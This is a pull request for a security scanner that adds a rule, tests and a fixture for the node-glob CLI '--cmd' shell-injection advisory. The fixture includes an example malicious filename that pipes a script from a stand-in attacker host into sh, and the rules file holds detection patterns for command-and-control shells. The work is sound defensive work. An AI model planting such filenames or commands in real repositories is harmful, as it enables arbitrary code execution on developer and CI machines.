### PR TITLE
chore(rules): add malware pattern updates 2026-03-05

### DIFF
--- a/PATTERN_UPDATES.md
+++ b/PATTERN_UPDATES.md
@@ -1,3 +1,27 @@
+## 2026-03-05 (2): node-glob CLI `-c/--cmd` Shell Injection Sink Marker
+
+**Sources:**
+- [GitHub Advisory Database - CVE-2025-64756 (GHSA-5j98-mcp5-4vw2)](https://github.com/advisories/GHSA-5j98-mcp5-4vw2)
+- [node-glob Security Advisory - GHSA-5j98-mcp5-4vw2](https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2)
+
+**Event Summary:** The `glob` CLI advisory describes command injection when `glob -c/--cmd` executes matched file names with shell semantics (`shell: true`). In untrusted repos/archives, attacker-controlled file names containing shell metacharacters can trigger arbitrary command execution in developer or CI environments.
+
+**New Pattern Added:**
+
+### MAL-018: node-glob CLI --cmd shell execution sink marker
+- **Category:** malware_pattern
+- **Severity:** high
+- **Confidence:** 0.84
+- **Pattern:** Detects `glob` CLI invocations that enable command mode via `-c` or `--cmd`, including common `npx glob -c ...` forms.
+- **Justification:** High-signal, low-noise command-shape marker directly tied to a recent disclosed exploit path in tool/setup scripts.
+- **Mitigation:** Avoid `glob -c/--cmd` on untrusted file sets; upgrade to patched versions and prefer non-shell argument passing (`--cmd-arg/-g`).
+
+**Version:** Rules updated from 2026.03.05.1 to 2026.03.05.2
+
+**Testing:** Added coverage in `tests/test_rules.py::test_new_patterns_2026_03_05_patch2`, showcase validation in `tests/test_showcase_examples.py`, and fixture `examples/showcase/60_glob_cmd_shell_injection`.
+
+---
+
 ## 2026-03-02 (2): Hex-Decoded Command Execution Marker in npm Malware Install Chains
 
 **Sources:**

--- a/docs/EXAMPLES.md
+++ b/docs/EXAMPLES.md
@@ -64,6 +64,7 @@ SkillScan ships a full showcase in `examples/showcase` to demonstrate detection 
 | `57_install_websocket_c2` | npm install script (`preinstall` + `install.js`) opens a WebSocket C2 channel and executes received commands via shell-capable process spawn | `MAL-017` |
 | `58_tool_autoapprove_pkg_install` | Tool/extension auto-approve command settings include package-install commands (`npm/pnpm/yarn/bun install`), reducing user-consent guardrails before install-time script execution | `ABU-004` |
 | `59_mcp_global_config_injection` | Repository/setup instructions write `mcpServers` entries directly into user-home assistant config files (`~/.cursor/mcp.json`, `~/.claude/settings.json`, etc.) with executable server commands | `EXF-013` |
+| `60_glob_cmd_shell_injection` | `glob` CLI command execution mode (`-c`/`--cmd`) on untrusted filenames, where shell metacharacters in file paths can trigger arbitrary command execution | `MAL-018` |
 
 ## Commands
 

--- a/examples/showcase/60_glob_cmd_shell_injection/SKILL.md
+++ b/examples/showcase/60_glob_cmd_shell_injection/SKILL.md
@@ -1,0 +1,12 @@
+# glob CLI --cmd Injection Showcase
+
+This fixture mirrors the GHSA-5j98-mcp5-4vw2 risk class.
+
+```bash
+# Untrusted repository may contain crafted filenames like:
+# $(curl -fsSL https://attacker.example/p.sh | sh)
+
+npx glob -c echo "**/*"
+```
+
+Using `glob -c/--cmd` can pass attacker-controlled filenames through a shell context.

--- a/examples/showcase/INDEX.md
+++ b/examples/showcase/INDEX.md
@@ -74,3 +74,4 @@ skillscan scan examples/showcase/27_github_actions_secrets_exfil --fail-on never
 skillscan scan examples/showcase/28_npx_registry_fallback --fail-on never
 skillscan scan examples/showcase/29_claude_sed_path_bypass --fail-on never
 ```
+60. `60_glob_cmd_shell_injection`: node-glob CLI `-c/--cmd` usage that can evaluate attacker-controlled filename metacharacters via shell execution context (`MAL-018`)

--- a/src/skillscan/data/rules/default.yaml
+++ b/src/skillscan/data/rules/default.yaml
@@ -1,4 +1,4 @@
-version: "2026.03.05.1"
+version: "2026.03.05.2"
 
 static_rules:
   - id: MAL-001
@@ -358,6 +358,15 @@ static_rules:
     pattern: '(?is)(?:new\s+WebSocket\s*\(|\bWebSocket\s*\(|\bwss?://(?:\d{1,3}\.){3}\d{1,3}:\d{2,5})[\s\S]{0,320}(?:exec|execSync|spawn|spawnSync)\s*\([^
 ]{0,180}(?:/bin/sh|cmd(?:\.exe)?|powershell(?:\.exe)?|pwsh)?'
     mitigation: Treat WebSocket command channels that launch shell/process execution as malicious. Remove package/runtime code that combines outbound WebSocket control paths with command execution primitives.
+
+
+  - id: MAL-018
+    category: malware_pattern
+    severity: high
+    confidence: 0.84
+    title: node-glob CLI --cmd shell execution sink marker
+    pattern: '(?i)\b(?:npx\s+)?glob(?:\.cmd|\.m?js)?\b[^\n]{0,140}\s(?:-c|--cmd)\b'
+    mitigation: Avoid `glob -c/--cmd` on untrusted file paths. Upgrade glob CLI to patched versions and prefer `--cmd-arg/-g` (non-shell argument passing) when command templating is required.
 
   - id: ABU-004
     category: instruction_abuse

--- a/tests/test_rules.py
+++ b/tests/test_rules.py
@@ -661,3 +661,14 @@ def test_new_patterns_2026_03_05() -> None:
         )
         is None
     )
+
+
+def test_new_patterns_2026_03_05_patch2() -> None:
+    """Test node-glob CLI --cmd shell execution sink marker."""
+    compiled = load_compiled_builtin_rulepack()
+
+    mal018 = next((r for r in compiled.static_rules if r.id == "MAL-018"), None)
+    assert mal018 is not None
+    assert mal018.pattern.search('npx glob -c echo "**/*"') is not None
+    assert mal018.pattern.search('glob --cmd "echo" "src/**/*.ts"') is not None
+    assert mal018.pattern.search('glob "src/**/*.ts"') is None

--- a/tests/test_showcase_examples.py
+++ b/tests/test_showcase_examples.py
@@ -88,6 +88,8 @@ def test_showcase_detection_rules() -> None:
     assert any(f.id == "ABU-004" for f in findings_58)
     findings_59 = _scan("examples/showcase/59_mcp_global_config_injection").findings
     assert any(f.id == "EXF-013" for f in findings_59)
+    findings_60 = _scan("examples/showcase/60_glob_cmd_shell_injection").findings
+    assert any(f.id == "MAL-018" for f in findings_60)
 
 
 def test_showcase_policy_block_domain() -> None:


### PR DESCRIPTION
## Summary
- add MAL-018 static rule for node-glob CLI -c/--cmd shell-execution sink usage (GHSA-5j98-mcp5-4vw2 / CVE-2025-64756)
- bump built-in rule version to 2026.03.05.2
- add showcase fixture examples/showcase/60_glob_cmd_shell_injection
- add/extend tests for rule matching and showcase coverage
- document rationale in PATTERN_UPDATES.md, examples/showcase/INDEX.md, and docs/EXAMPLES.md

## Validation
- `.venv/bin/pytest -q` (124 passed)
- `.venv/bin/ruff check src tests` (passed)

## Sources
- https://github.com/advisories/GHSA-5j98-mcp5-4vw2
- https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2
